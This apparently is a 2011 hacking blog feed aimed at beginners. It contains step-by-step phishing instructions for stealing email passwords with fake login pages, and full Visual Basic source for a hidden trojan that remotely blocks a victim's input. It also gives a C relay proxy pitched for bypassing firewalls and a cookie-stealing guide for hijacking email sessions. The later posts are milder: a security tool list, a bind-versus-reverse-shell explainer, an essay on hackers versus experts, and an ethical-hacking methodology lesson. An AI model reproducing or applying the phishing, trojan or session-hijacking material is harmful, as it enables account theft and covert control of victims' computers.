Hack My Stuff

Phishing to Hack Email Account Passwords

noreply@blogger.com (Eracnid Mitnick) — Wed, 01 Jun 2011 09:37:00 +0000

What is Phishing and how to use it for hacking?

1. First of all lets clear What is Phishing:

Basicly phishing is way of sending a fake page to victim which resembles the original page and ask the victim to login with the provided modified page called as phisher. This the most popular method used by hackers to hack email account passwords like myspace, gmail, yahoo, orkut, facebook, etc.

2. Does Phishing help in hacking email passwords?

This was the most basic question I read. No doubt, the reader is newbie and hence I have included this question over here. Helping newbies is my prime purpose. The answer is "Yes. Phishing is meant for hacking email passwords".

3. Which email passwords can be hacked using Phishing?

Phishing can be used to hack any email password or any online account password. It can be email account like hotmail, gmail, yahoo; social networking site account like myspace, orkut, faceboook; banking account; file sharing account or any account you want.

4. How do I perform Phishing?

Phishing is one of the easiest hacking methods. The only thing is you have to get the actual idea of what you have to do to hack email password.

5. What are webhosts?

Webhosts, to explain in short, are offering free webspace where we can upload our created phisher. Phisher is fake login page that we create and we have to upload it on internet. So, we need some space on internet for phisher which is provided by such free webhosts.

I would recommend you following webhosts:

6. Why I can't upload write.php?

Well to upload write.php file, your webhost must support php files. Try using webhosts I have illustrated in Q.5. They all support php.

7. Why I can't run Phisher Creator software on my computer?

For being able to run Phisher Creator software, your computer must have necessary library files installed. Install Library files package and even .NET Framework.

8. How do I send Phisher link to victim?

Get the Anonymous Emailer software and create a fake email and post the phisher link in this email. Ask victim to login to his account using this link. Also try using your logic to make him login to your sent phisher.

9. Why I don't get passes.txt file?

Passes.txt file is created only after victim logins with our sent phisher. If you are trying it, login using phisher and then go to file manager of FTP account. You will see passes.txt file created. If file is not present, try refreshing the page and you'll get it. If you're still not able to get passes.txt file, do one of following:

Re-login using phisher.
Change your webhost.
Re-start from beginning.

Sorry for this... but this has helped many visitors as they don't know where they had made a mistake. So, its always best to restart the process.

10. How do I get my Phisher link?

Go to File Manager. Upload your phisher created by Phisher creator. Now, click on uploaded "index.htm" file. You will see fake page. Now, in address bar, you will get your Phisher link. This is your Phisher link. Send this phisher link to your victim.

11. Why Phishing is not working for me?

I'm received many questions like this. I helped many readers and finally reached conclusion that most of them were not reading my article completely and carefully. So, read article completely and carefully. This is most common error made by readers.

Thats it. I hope now, you will have most of your doubts about Phishing cleared. This article is meant only for you.

Enjoy Phishing to hack email password...

Security/Hacking Tools & Utilities

noreply@blogger.com (Eracnid Mitnick) — Wed, 01 Jun 2011 09:24:00 +0000

Top Security/Hacking Tools & Utilities

Here are some of the best tools, which may/maynot be useful for your purpose but these tools are good enough to learn the different ways of Hacking.

1. Nmap

I think everyone has heard of this one, recently evolved into the 4.x series.
Nmap (“Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.

Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.

Get Nmap Here

2. Nessus Remote Security Scanner

Recently went closed source, but is still essentially free. Works with a client-server framework.
Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

Get Nessus Here

3. John the Ripper

Yes, JTR 1.7 was recently released!
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

You can get JTR Here

4. Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).
Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).

Get Nikto Here

5. SuperScan

Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.
If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.

Get SuperScan Here

6. p0f

P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:
– machines that connect to your box (SYN mode),
– machines you connect to (SYN+ACK mode),
– machine you cannot connect to (RST+ mode),
– machines whose communications you can observe.
Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.

Get p0f Here

7. Wireshark (Formely Ethereal)

Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.
Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.

Get Wireshark Here

8. Yersinia

Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).
The best Layer 2 kit there is.

Get Yersinia Here

9. Eraser
Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.
An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.

Get Eraser Here.

10. PuTTY
PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4x0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.

Get PuTTY Here.

11. LCP

Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.
A good free alternative to L0phtcrack.

Get LCP Here

12. Cain and Abel

My personal favourite for password cracking of any kind.
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.
Get Cain and Abel Here

13. Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.
A good wireless tool as long as your card supports rfmon (look for an orinocco gold).

Get Kismet Here

14. NetStumbler

Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.
NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:

Verify that your network is set up the way you intended.
Find locations with poor coverage in your WLAN.
Detect other networks that may be causing interference on your network.
Detect unauthorized “rogue” access points in your workplace.
Help aim directional antennas for long-haul WLAN links.
Use it recreationally for WarDriving.

Get NetStumbler Here

15. hping

To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.
hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.

Get hping Here

Simple trojan in vb ..... (only for learning)

noreply@blogger.com (Eracnid Mitnick) — Sun, 08 May 2011 22:44:00 +0000

Writing a Trojan is a lot easier than most people think. All it really involves is two simple applications both with fewer than 100 lines of code. The first application is the client or the program that one user knows about. The second is the server or the actual “trojan” part. I will now go through what you need for both and some sample code.

Server

The server is the Trojan part of the program. You usually will want this to be as hidden as possible so the average user can’t find it. To do this you start by using

Code: VB

Private Sub Form_Load()
     Me.Visible = False
End Sub

This little bit of code makes the program invisible to the naked eye. Now we all know that the task manager is a little bit peskier. So to get our application hidden from that a little better we make our code look like this.

Code: VB

Private Sub Form_Load()
     Me.Visible = False
     App.TaskVisible = False
End Sub

So now, we have a program that is virtually invisible to the average user, and it only took four lines of code. Now all of you are thinking that this tutorial sucks right about now so lets make it a lot better by adding functions to our Trojan!
The first thing we want to do is make it be able to listen for connections when it loads. So in order to do this we need to add a Winsock Control. I named my control win but you can name yours what ever.

Now to make it listen on port 2999 when the Trojan starts up we make our code look like this.

Code: VB

Private Sub Form_Load()
     Me.Visible = False
     App.TaskVisible = False
     win.LocalPort = 2999
     win.RemotePort = 455
     win.Listen
End Sub

This code will set the local open port to 2999 and the port it sends it to is 455. So now, we have a program that listens but still doesn’t do anything neat. Lets make it block the input of the user completely when we tell it to!

To do this little devious thing we need to add a module with the following code

Public Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long

Then we add this code to our main form:

Code: VB

Private Sub win_ConnectionRequest(ByVal requestID As Long)
     win.Close
     win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
    win.GetData GotDat
    DoActions (GotDat)
End Sub

The code in the module is called a windows API. It uses a dll file to do tasks that we want. Now this code still won’t block the users input but we are very close. We now need to program the DoActions function that we called on our main form. In case you were wondering the code that we added to the form does two different things. The first sub makes it so all connection requests are automatacly accepted. The second sub makes it so all data is automaticly accepted and it then passes all of the data to the function DoActions which we are about to code.

For the DoActions code, we want to make a public function in the module. So add this code to the module and we are about done with the server of the Trojan!

Code: VB

Public Function DoActions(x As String)
     Dim Action
     Select Case x
             Case "block"
             Action = BlockInput(True)
     End Select
End Function

Ok now we have a program that when the data “block” is sent to it on port 2999 it will block the users input. I made a Select Case statement so it is easy to modify this code to your own needs later on. I recommend adding a unblock feature of your own. To do that just call the BlockInput function with the argument False instead of true.

Main Form

Code: VB

Private Sub Form_Load()
     Me.Visible = False
     App.TaskVisible = False
     win.LocalPort = 2999
     win.RemotePort = 455
     win.Listen
End Sub

Private Sub win_ConnectionRequest(ByVal requestID As Long) ' As corrected by Darkness1337
     win.Close
     win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
     win.GetData GotDat
     DoActions (GotDat)
End Sub

Remember to add your winsock control and name it to win if you use this code.

Code: VB

Module

Public Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long                      

Public Function DoActions(x As String)
     Dim Action
     Select Case x
               Case "block"
               Action = BlockInput(True)
     End Select
End Function

That’s all there is to the server side or Trojan part of it. Now on to the Client.

Client

The client will be what you will interact with. You will use it to connect to the remote server (trojan) and send it commands. Since we made a server that accepts the command of “block” lets make a client that sends the command “block”.

Make a form and add a Winsock Control, a text box, and three buttons. The Text box should be named txtIP if you want it to work with this code. In addition, your buttons should be named cmdConnect, cmdBlockInput, and cmdDisconnect. Now lets look at the code we would use to make our Client.

Code: VB

Private Sub cmdConnect_Click()
     IpAddy = txtIp.Text
     Win.Close
     Win.RemotePort = 2999
     Win.RemoteHost = IpAddy
     Win.LocalPort = 9999
     Win.Connect
     cmdConnect.Enabled = False
End Sub

Private Sub cmdDisconnect_Click()
     Win.Close
     cmdConnect.Enabled = True
End Sub
           
Private Sub cmdBlockInput_Click()
     Win.SendData "block"
End Sub

That is the code for the client. All it does is gets the Ip Adress from txtIp and connects to it on remote port 2999. Then when connected you can send the “block” data to block off their input.

Exploiting buggy/weak Firewall's

noreply@blogger.com (Eracnid Mitnick) — Sun, 08 May 2011 22:38:00 +0000

In this tutorial we'll be looking at a new way(at least for me) to bypass weak firewalls...

A firewall is a device or set of devices designed to permit or deny network transmissions based upon a set of rules and is frequently used to protect networks from unauthorized access while permitting legitimate communications to pass. (Wikipedia)

In basic language.. Firewall contains a list of some basic rules/signatures like packet filters etc etc.. It basically checks the network traffic for content that can be malicious or can be potentially harmful for the machine..

Firewalls are implemented for securing parts of the network from Hackers or any malicious users but , However if a Firewall is poorly written/implemented it will make the exploitation easier rather.. for demonstrating how these can be exploited I'll take up a Scenario..

Scenario

Most of the buggy firewalls out there carry out packet filtering by relying on the packet data..(Which indeed not to be trusted upon)..

Lets take an example that there is a System with one of these buggy firewalls and is protecting SSH , SMB etc.. But still other services like ftp and http are not filtered as they are readily used by their clients..

Now our job is to carry out requests with 22 as port number (FTP) and Destination Port No set to the service we want to access(SMB Port 445)..This would bypass the firewall leading to easy exploitation..

Tool that can be used (Kev proxy) :-

Code:

/*
 * kev proxy
 * it's not big, but then, it's not that clever either.
 *
 * compile with cc -o kp kp.c -lpthread
 * tested on Red Hat 8, should work on most Linux
 *
 * kp listen_port target_ip target_port  
 *
 * kp will listen on the listen_port and relay bi-directional data
 * between this port and the target_port on the target_ip.
 * The optional source_port is to set the source port on the outbound
 * connection to the target_ip.  Useful for getting around ACLs in
 * routers and firewalls.
 * 'v' indicates verbose mode for extra info.
 *
 * Note: it does not operate as a 'real' HTTP proxy, although it can
 * proxy HTTP as well as any other TCP protocol; just don't let your
 * browser know it's talking to a proxy ;) (unless, of course, you're
 * proxying for an HTTP proxy!)
*/


#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 


int listen_port, target_port, source_port, verbose;
char target_ip[1024];

void * kp(void *);

void die(int sig)
{
    pthread_exit(NULL);
}

void usage()
{
    printf("kp listen_port target_ip target_port  \n");
}

int getMax(int q1, int q2)
{
    if (q1 > q2) return q1; else return q2;
}

int main(int argc, char **argv)
{
    int fd, fd1;
    const int on = 1;
    struct sockaddr_in fd_sock, fd_sock1;
    socklen_t listenlen;
    pthread_t ptConnection;

    (void) signal (SIGINT, die);

    verbose = 0;
    source_port = 0;

    if ((argc < 4) || (argc > 6))
    {
        usage();
        exit(1);
    }

    printf("kevproxy\n");

    listen_port = atoi(argv[1]);
    target_port = atoi(argv[3]);
    if (argc > 4) {
        if (strcmp(argv[4], "v") == 0)
        {
            if (argc > 5)
            {
                usage();
                exit(1);
            }
            verbose = 1;
            source_port = 0;
        } else {
            source_port = atoi(argv[4]);
            if (argc > 5)
            {
                if (strcmp(argv[5], "v") == 0)
                {
                    verbose = 1;
                } else {
                    usage();
                    exit(1);
                }
            }
        }
    } else {
        source_port = 0;
    }

    strcpy(target_ip, argv[2]);

    printf("Listening on %d, sending to %s:%d", listen_port, target_ip, target_port);
    if (source_port != 0) {
        printf(", source port %d\n", source_port);
    } else {
        printf("\n");
    }

    // fd_sock is listener
    fd_sock.sin_family = AF_INET;
    fd_sock.sin_port = htons(listen_port);
    fd_sock.sin_addr.s_addr = INADDR_ANY;

    fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd <0) {
        perror("fd: opening stream socket");
        return -1;
    }
    if (verbose) printf("socket fd made\n");

    if (setsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &on, sizeof (on)) != 0)
    {
        perror("fd: setsockopt failed");
    }
    if (verbose) printf("socket fd option set\n");

    if (bind(fd, (struct sockaddr *)&fd_sock, sizeof fd_sock) <0)
    {
        return 0;
    }
    if (verbose) printf("Bound fd!\n");

    if (listen(fd, 1024) < 0)
    {
        return 0;
    }
    if (verbose) printf("fd: listening!\n");

    for (;;)
    {
        // fd_sock1 is the accepted conx
        fd_sock1.sin_family = AF_INET;
        fd_sock1.sin_port = INADDR_ANY;
        fd_sock1.sin_addr.s_addr = INADDR_ANY;
    
        listenlen = sizeof fd_sock1;
        fd1 = accept(fd, (struct sockaddr *)&fd_sock1, &listenlen);

        if (fd1 < 0)
        {
            return 0;
        }
        if (verbose) printf("fd1: accepted!\n");

        if (pthread_create (&ptConnection, NULL, kp, &fd1) != 0)
        {
            perror("could not create thread");
            return 0;
        }
        if (verbose) printf("thread created\n");

        if ( (pthread_detach(ptConnection)) != 0)
        {
            perror("could not detach thread");
        }
        if (verbose) printf("thread detached\n");
    }
}

void closesocks(int sock1, int sock2)
{
    while (close(sock1) != 0);
    if (verbose) printf("sock1 closed\n");
    while (close(sock2) != 0);
    if (verbose) printf("sock2 closed\n");
}

void * kp(void *fd_in)
{
    fd_set socks;
    int selectret;
    int maxsock;
    int accfd, fd2;
    int num;
    char buff[65100];
    struct sockaddr_in fd_sock2, fd_sock3;

    accfd = * (int *) fd_in;

    if (verbose) printf("accfd = %d\n", accfd);

        // fd_sock2 is local port of outbound conx
    fd_sock2.sin_family = AF_INET;
    fd_sock2.sin_port = htons(source_port);
    fd_sock2.sin_addr.s_addr = INADDR_ANY;

    // fd_sock3 is outbound conx
    fd_sock3.sin_addr.s_addr=inet_addr(target_ip);
    fd_sock3.sin_port = htons(target_port);
    fd_sock3.sin_family = AF_INET;

    fd2 = socket(AF_INET, SOCK_STREAM, 0);
    if (fd2 <0) {
        perror("fd2: opening stream socket");
        return NULL;
    }
    if (verbose) printf("socket fd2 made\n");

    if (source_port != 0) {
        if (bind(fd2, (struct sockaddr *)&fd_sock2, sizeof fd_sock2) < 0)
        {
            perror("fd2: bind failed");;
        } else {
            if (verbose) printf("Bound fd2!\n");
        }
    }

    if (connect(fd2, (struct sockaddr *)&fd_sock3, sizeof fd_sock3) < 0)
    {
        perror("fd2: connect");
        return  NULL;
    }
    if (verbose) printf("Connected fd2!\n");

    maxsock = getMax(accfd, fd2);

    while (1) {
        //printf(".");
        FD_SET (accfd, &socks);
        FD_SET (fd2, &socks);

        selectret = select (maxsock+1, &socks, NULL, NULL, NULL);
        if (selectret == -1)
        {
            perror("select failed");
            break;
        }

        if (FD_ISSET (accfd, &socks))
        {
            num = read(accfd, buff, 65000);
            if (num <=0)
            {
                closesocks(accfd,fd2);
                break;
            }
            if (write(fd2, buff, num) != num)
            {
                perror("fd2 write error");
            }
            if (verbose) printf("accfd -> fd2, %d bytes\n", num);
        }

        if (FD_ISSET (fd2, &socks))
        {
            num = read(fd2, buff, 65100);
            if (num <=0)
            {
                closesocks(accfd,fd2);
                break;
            }
            if (write(accfd, buff, num) != num)
            {
                perror("accfd write error");
            }
            if (verbose) printf("fd2 -> accfd, %d bytes\n", num);
        }

    }
    if (verbose) printf("thread exiting\n");
    pthread_exit(NULL);
    return NULL;

Difference between Bind Shell and Reverse Shell

noreply@blogger.com (Eracnid Mitnick) — Sun, 08 May 2011 04:06:00 +0000

Let us see the basic differences between a bind shell and a reverse shell..

What is a Shell

A shell is a software that acts as a intermediary between user and the kernel. It provides the user an interface which provides access to the services of kernel.

Eg : Bash shell etc..

Code:

+-----------------+               _______________           +----------------+
| Aneesh          |  Behind NAT  /              /           | Shabbir        |
| With Private ip | ----> ----> /  Internet    /----> ----> | with Public IP |
+-----------------+            /______________/             +----------------+

Ok.. So in this scenario.. Aneesh has a computer connected to the internet with a private ip..(no hosting) while Shabbir is connected to the internet with a Public IP (Hosted)..It basically means Shabbir's system can be accessed by any one connected on the internet but this does'nt go for Aneesh.. Aneesh's system being behing the NAT cannot be directly connected by other Machines on the internet..

Bind Shell

Lets suppose Shabbir has encountered some problem with his system and need some help from Aneesh.. He simply binds his shell (cmd.exe or /bin/bash) to a specific port and sends Aneesh its port no and other details.. In this scenario Aneesh can simply connect to the Shabbir's Machine and Get the Shell!!So in this case :-

Aneesh's End :-Connect to shabbir (Acts as a client)
Shabbir's End :-Listen for connections (listen / act as a server and bind his command shell on the network..)

Reverse Shell

Now lets suppose after some days Aneesh screwed up his system and now he asks Shabbir for his help..But in this case the bind shell cannot be used as 'Aneesh' doesn't have a Public IP and his system is not available publicly!! Now to conquer this problem. Aneesh sends his command prompt to Shabbir.. So , in this case :-

Aneesh's End :-Would bind his shell and send it to Shabbir through the network..(Connect)
Shabbir's End :-Listen for connections , Respond to them (listen / act as a server)

That's all for this article.. I hope the viewers like it..

Hacker and Expert

noreply@blogger.com (Eracnid Mitnick) — Sun, 08 May 2011 04:06:00 +0000

Hacker and Expert

In one of my articles I explained that, "there is a difference between a hacker (not an expert) and an information security (is expert)". Simply in this section I am trying to explain you the difference between an expert and a hacker in detail. Always remember my phrase that, "an expert can become a hacker, but a hacker cannot become an expert". Now I will tell you how a hacker is not an expert, in depth in this topic and what the difference between a hacker and an expert is. The big false psychology of a large population thinks a hacker as an expert. But, I want to explain that it’s false and I want you to change this false knowledge from your mind. I am indirectly trying to change your attitude so that you can understand and accept the right thing. As I mentioned in previous chapter, the children in the age group of 14-16 years are now a days hacking websites and accessing important information from internet. Internet is a big source of information now days. Thus, resulting into an endless quantity of information, that can be retrieved from the internet. Human being’s end will come soon in comparison to availability of information on internet, if we compare human beings continuously surfing for information on internet simultaneously, for whole of their lives.

Now, coming to point many hackers and institutes self claims to be big hacker’s and intend to prove themselves as experts of information security field in order to providing seminars, workshops, certifications, courses, etc. just to expand their business rapidly. I have several, more then sufficient evidence against such peoples and institutes which proves that, “they might be hacker, but they are not experts”. Actually, these peoples use the internet and find several tools created by some experts. The people who create and make these tools and software available for others to use are known as experts, and not those peoples who uses these tools and software for undertaking hacking related or any other activities just to give false proofs of their expertise and/or talent. So, this kind of above mentioned self claimed hackers are not called experts from any point of view.

Not only this but the self claimed hackers and institutes also surf many educational and universities websites and find important documents, thesis, articles, etc. publicly available for everyone globally. They start the process to copy and paste of all this readily available data, until it gets converted to a book, study material, reference material, etc. So, here also you can see that there is no expert level job or action performed by such self claimed hacker and institutes which try to prove themselves expert. The documents, statements, thesis, contents, articles, etc. which were prepared by someone else are just copied in their books, study materials or reference books. I don’t know whether this is expertise according to changing attitude of various peoples or it’s a stealing process.

This is not only the final limit of stunts used by self claimed hackers and institutes. Other then this, many of them also creates study materials for their so said security and hacking, courses and certifications; by filling the whole of the study material with topics which do not have even single percent of information related to hacking or information security. I have researched through many of such books, reference materials and also found those places, from where such data was copied in their study material, books, etc. For example there is a networking course called MCSE (Microsoft Certified Systems Engineer). Many self claimed hackers and institutes use the contents of Microsoft published material, books, tools, presentations, programs, etc. for the information security courses, ethical hacking courses, hacking related books, hacking and security related certifications, etc. Now tell me whether what is the expertise level of such courses, certifications, books, study materials, etc? So, I hope this is enough for explaining about the difference between, ‘a hacker and an expert’.

Information Security and Hacking:

In my earlier days when I learned the basic hacking techniques & methods and applied for job in many companies, I got a very disgusting, insulting and negative reply from many of such highly reputed companies. I remember that I used to send my resume to United Kingdom and United States also, and thanks to a person from United Kingdom where I sent my resume who was the first person from whom I got this knowledge and experience. He replied me that, “don’t use the term hacking in any statements wherein it concerns about your career, business, education, etc. Here in UK, peoples from non-technical, technical and legal fields treat hacking or hacker as a part of crime and instead of giving you a job they may undertake actions against you. I know you might be feeling bad for such an unexpected reply from me, though your intention is to undertake good work and help the information security community. But along with this bitter reply, you will also have to remember that this reply will be a good lesson for your coming days”. Then after, I received many such responses from several peoples who were the highly reputed authorities of multinational and reputed companies.

So, this is the reason I am trying to explain you that please don’t go behind terms where hacking is used. With a caring intention I am explaining this, so that you don’t taste such a bitter experience, which I have faced several times. In companies within many countries no one will even sit (sit here means keeping any relations or terms) beside you nor is any chance of getting jobs or business from such companies. You may only get career chances and business opportunities when you use the terms mentioned in information security field and which are community approved terms. The very young generation of students think that let's learn hacking and go for various kinds of ethical hacking courses which are not of any use for a brilliant career. Only it's a passion ! the young generation has been misguided by some peoples for their personal benefits. The terms of information security field are legal and technical, which will give you opportunities to make your career, make your status and make your reputation. Most of all, the information security terms will not be disgusting or insulting from any point of view for you as concerns to your career matter. So, you have to choose the option what way you want to live your life. For example, media publishes the names of criminals and also publishes names of reputed peoples. Both kinds of peoples are similarly known between large populations globally due to such publicity. But the difference is that one kind of person is known by his criminal activities publicity and the other kind of person is known by his good activities publicity. So, you have to decide as to in which list you want your name to be in – a good one or a bad one.

Now, let me introduce one of such self claimed hacker’s example. His name is Ankit Fadia. However, there are several institutes too in my eyes. But they are not yet spreaded across globe. If you search for key word ‘Ankit Fadia’ in google and go through the first thirty search results you may know the reality behind point I am trying to specify in both of my articles. However, for your ease I would like to give some examples of reference sources for evidence, as what I am saying is what is truth and fact behind Ankit Fadia. Please go through these references:

http://lists.grok.org.uk/pipermail/full-disclosure/2003-September/009654.html
http://en.wikipedia.org/wiki/Talk:Ankit_Fadia

How to Hack Email Account with Cookie stealing [For Newbies]

noreply@blogger.com (Eracnid Mitnick) — Sun, 08 May 2011 04:04:00 +0000

Cookie Stealing.

I observed that cookie stealing is neglected by some fellow hackers (even I was one of them). But, recently, I discovered that cookie stealing can be pretty handy to hack an Email account. In the following article, I have covered basics of how to hack an Email account using Cookie Stealing.

How to hack Email account:

If you are a newbie and don't know about cookie, then for your information, Cookie is a piece of text stored on user computer by websites visited by the user. This stored cookie is used by webserver to identify and authenticate the user. So, if you steal this cookie (which is stored in victim browser) and inject this stealed cookie in your browser, you can imitate victim identity to webserver and enter hisEmail account easily. This is called Session Hijacking. Thus, you can easily hack Email account using such Cookie stealing hacks.

Tools needed for Cookie stealing attack:

Cookie stealing attack requires two types of tools:

Cookie capturing tool
Cookie injecting/editing tool

1. Cookie capturing tool:

Suppose, you are running your computer on a LAN. The victim too runs on same LAN. Then, you can use Cookie capturing tool to sniff all the packets to and from victim computer. Some of the packets contain cookie information. These packets can be decoded using Cookie capturing tool and you can easily obtain cookie information necessary to hackEmail account. Wireshark and HTTP Debugger Pro softwares can be used to capture cookies.

Update: Check out my Wireshark tutorial for more information on cookie capturing tool.

2. Cookie injecting/editing tool:

Now, once you have successfully captured your victim cookies, you have inject those cookies in your browser. This job is done using Cookie injecting tool. Also, in certain cases after injection, you need to edit cookies which can be done by Cookie editing tool. This cookie injection/editing can be done using simple Firefox addons Add N Edit Cookies and Greasemonkey scripts. I will write more on these two tools in my future articles.

Drawbacks of Cookie Stealing:

Cookie Stealing is neglected because it has some serious drawbacks:

Cookie has an expiry time i.e. after certain trigger cookie expires and you cannot use it to hijack victim session. Cookie expiry is implemented in two ways:
1. By assigning specific timestamp(helpful for us).
2. By checking for triggers like user exiting from webbrowser. So, in such cases, whenever user exits from his browser, his cookie expires and our captured cookie becomes useless.
Cookie stealing becomes useless in SSL encrypted environment i.e. for https (Secure HTTP) links. But, most Email accounts and social networking sites rarely use https unless vicitm has manually set https as mandatory connection type.
Also, most cookies expire once victim hits on LogOut button. So, you have to implement this Cookie stealing hack while user is logged in. But, I think this is not such a serious drawback because most of us have the habit of checking "Remember Me". So, very few people actually log out of their accounts on their PCs.

So friends, this was a short tutorial on basics of how to hack Email account using Cookie Stealing. As I have stated, Cookie stealing has some disadvantages. But, I think Cookie stealing is a handy way to hack an Email account. In my next articles, I will post detailed tutorial to hack Facebook and Gmail accounts using Cookie stealing. If you have any problem in this tutorial on how to hack Email account using Cookie stealing, please mention it in comments.

Enjoy Cookie stealing trick to hack Email account...

Ethical Hacking Class part 2

noreply@blogger.com (Eracnid Mitnick) — Tue, 22 Feb 2011 11:13:00 +0000

Introduction

Continuation of Ethical Hacking Basics Class part 1

The Transmission Control Protocol/Internet Protocol (TCP/IP) suite is so dominant and important to ethical hacking that it is given wide coverage in this lesson. Many tools, attacks, and techniques that will be covered throughout this class are based on the use and misuse of TCP/IP protocol suite. Understanding its basic functions will advance your security skills. This lesson also spends time reviewing the attacker’s process and some of the better known methodologies used by ethical hackers.

The Attacker’s Process

Objective:

State the process or methodology hackers use to attack networks

Attackers follow a fixed methodology. To beat a hacker, you have to think like one, so it’s important to understand the methodology. The steps a hacker follows can be broadly divided into six phases, which include pre-attack and attack phases:

Performing Reconnaissance
Scanning and enumeration
Gaining access
Escalation of privilege
Maintaining access
Covering tracks and placing backdoors

NOTE

A denial of service (DoS) might be included in the preceding steps if the attacker has no success in gaining access to the targeted system or network. Let’s look at each of these phases in more detail so that you better understand the steps.

Performing Reconnaissance

Reconnaissance is considered the first pre-attack phase and is a systematic attempt to locate, gather, identify, and record information about the target. The hacker seeks to find out as much information as possible about the victim. This first step is considered a passive information gathering. As an example, many of you have probably seen a detective movie in which the policeman waits outside a suspect’s house all night and then follows him from a distance when he leaves in the car. That’s reconnaissance; it is passive in nature, and, if done correctly, the victim never even knows it is occurring.

Hackers can gather information in many different ways, and the information they obtain allows them to formulate a plan of attack. Some hackers might dumpster dive to find out more about the victim. Dumpster diving is the act of going through the victim’s trash. If the organization does not have good media control policies, many types of sensitive information will probably go directly in the trash. Organizations should inform employees to shred sensitive information or dispose of it in an approved way.

Don’t think that you are secure if you take adequate precautions with paper documents. Another favorite of the hacker is social engineering. A social engineer is a person who can smooth talk other individuals into revealing sensitive information. This might be accomplished by calling the help desk and asking someone to reset a password or by sending an email to an insider telling him he needs to reset an account.

If the hacker is still struggling for information, he can turn to what many consider the hacker’s most valuable reconnaissance tool, the Internet. That’s right; the Internet offers the hacker a multitude of possibilities for gathering information. Let’s start with the company website. The company website might have key employees listed, technologies used, job listings probably detailing software and hardware types used, and some sites even have databases with employee names and email addresses.

Scanning and Enumeration

Scanning and enumeration is considered the second pre-attack phase. Scanning is the active step of attempting to connect to systems to elicit a response. Enumeration is used to gather more in-depth information about the target, such as open shares and user account information. At this step in the methodology, the hacker is moving from passive information gathering to active information gathering. Hackers begin injecting packets into the network and might start using scanning tools such as Nmap. The goal is to map open ports and applications. The hacker might use techniques to lessen the chance that he will be detected by scanning at a very slow rate. As an example, instead of checking for all potential applications in just a few minutes, the scan might take days to verify what applications are running. Many organizations use intrusion detection systems(IDS) to detect just this type of activity. Don’t think that the hacker will be content with just mapping open ports. He will soon turn his attention to grabbing banners. He will want to get a good idea of what type of version of software applications you are running. And, he will keep a sharp eye out for down-level software and applications that have known vulnerabilities. An example of down-level software would be Windows 95.

